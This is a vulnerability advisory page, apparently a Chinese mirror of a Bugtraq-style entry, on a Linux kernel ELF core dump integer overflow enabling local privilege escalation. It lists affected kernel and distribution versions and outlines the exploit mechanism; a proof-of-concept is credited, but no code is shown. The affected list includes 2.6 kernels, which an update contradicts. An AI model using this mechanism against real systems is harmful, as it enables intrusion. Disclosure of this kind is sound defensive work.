Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.5.69
Linux kernel 2.5.68
Linux kernel 2.5.67
Linux kernel 2.5.66
Linux kernel 2.5.65
Linux kernel 2.5.64
Linux kernel 2.5.63
Linux kernel 2.5.62
Linux kernel 2.5.61
Linux kernel 2.5.60
Linux kernel 2.5.59
Linux kernel 2.5.58
Linux kernel 2.5.57
Linux kernel 2.5.56
Linux kernel 2.5.55
Linux kernel 2.5.54
Linux kernel 2.5.53
Linux kernel 2.5.52
Linux kernel 2.5.51
Linux kernel 2.5.50
Linux kernel 2.5.49
Linux kernel 2.5.48
Linux kernel 2.5.47
Linux kernel 2.5.46
Linux kernel 2.5.45
Linux kernel 2.5.44
Linux kernel 2.5.43
Linux kernel 2.5.42
Linux kernel 2.5.41
Linux kernel 2.5.40
Linux kernel 2.5.39
Linux kernel 2.5.38
Linux kernel 2.5.37
Linux kernel 2.5.36
Linux kernel 2.5.35
Linux kernel 2.5.34
Linux kernel 2.5.33
Linux kernel 2.5.32
Linux kernel 2.5.31
Linux kernel 2.5.30
Linux kernel 2.5.29
Linux kernel 2.5.28
Linux kernel 2.5.27
Linux kernel 2.5.26
Linux kernel 2.5.25
Linux kernel 2.5.24
Linux kernel 2.5.23
Linux kernel 2.5.22
Linux kernel 2.5.21
Linux kernel 2.5.20
Linux kernel 2.5.19
Linux kernel 2.5.18
Linux kernel 2.5.17
Linux kernel 2.5.16
Linux kernel 2.5.15
Linux kernel 2.5.14
Linux kernel 2.5.13
Linux kernel 2.5.12
Linux kernel 2.5.11
Linux kernel 2.5.10
Linux kernel 2.5.9
Linux kernel 2.5.8
Linux kernel 2.5.7
Linux kernel 2.5.6
Linux kernel 2.5.5
Linux kernel 2.5.4
Linux kernel 2.5.3
Linux kernel 2.5.2
Linux kernel 2.5.1
Linux kernel 2.5 .0
Linux kernel 2.4.31 -pre1
Linux kernel 2.4.30 rc3
Linux kernel 2.4.30 rc2
Linux kernel 2.4.30
Linux kernel 2.4.29 -rc2
Linux kernel 2.4.29 -rc1
Linux kernel 2.4.29
Linux kernel 2.4.28
Linux kernel 2.4.27 -pre5
Linux kernel 2.4.27 -pre4
Linux kernel 2.4.27 -pre3
Linux kernel 2.4.27 -pre2
Linux kernel 2.4.27 -pre1
Linux kernel 2.4.27
Linux kernel 2.4.26
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.9
Linux kernel 2.4.8
Linux kernel 2.4.7
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
Linux kernel 2.4.3
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4
Linux kernel 2.3.99 -pre7
Linux kernel 2.3.99 -pre6
Linux kernel 2.3.99 -pre5
Linux kernel 2.3.99 -pre4
Linux kernel 2.3.99 -pre3
Linux kernel 2.3.99 -pre2
Linux kernel 2.3.99 -pre1
Linux kernel 2.3.99
Linux kernel 2.3 .x
Linux kernel 2.3
Linux kernel 2.2.27 -rc2
Linux kernel 2.2.27 -rc1
Linux kernel 2.2.26
Linux kernel 2.2.25
Linux kernel 2.2.24
Linux kernel 2.2.23
Linux kernel 2.2.22
Linux kernel 2.2.21
Linux kernel 2.2.20
Linux kernel 2.2.19
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
Linux kernel 2.2.16 pre6
Linux kernel 2.2.16
Linux kernel 2.2.15 pre20
Linux kernel 2.2.15 pre16
Linux kernel 2.2.15
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
Linux kernel 2.2.12
Linux kernel 2.2.11
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.2
Linux kernel 2.2.1
Linux kernel 2.2 .x
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Linux kernel 2.2
Conectiva Linux 10.0
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Integrated Management
Avaya CVLAN
Avaya Converged Communications Server 2.0

- 漏洞讨论

The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call.

To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'.

Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation.

**Update: This vulnerability does not exist in the 2.6 kernel tree.

- 漏洞利用

Paul Starzetz <ihaquer@isec.pl> provided the following proof-of-concept, denial-of-service code:

- 解决方案

Please see the referenced vendor advisories for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站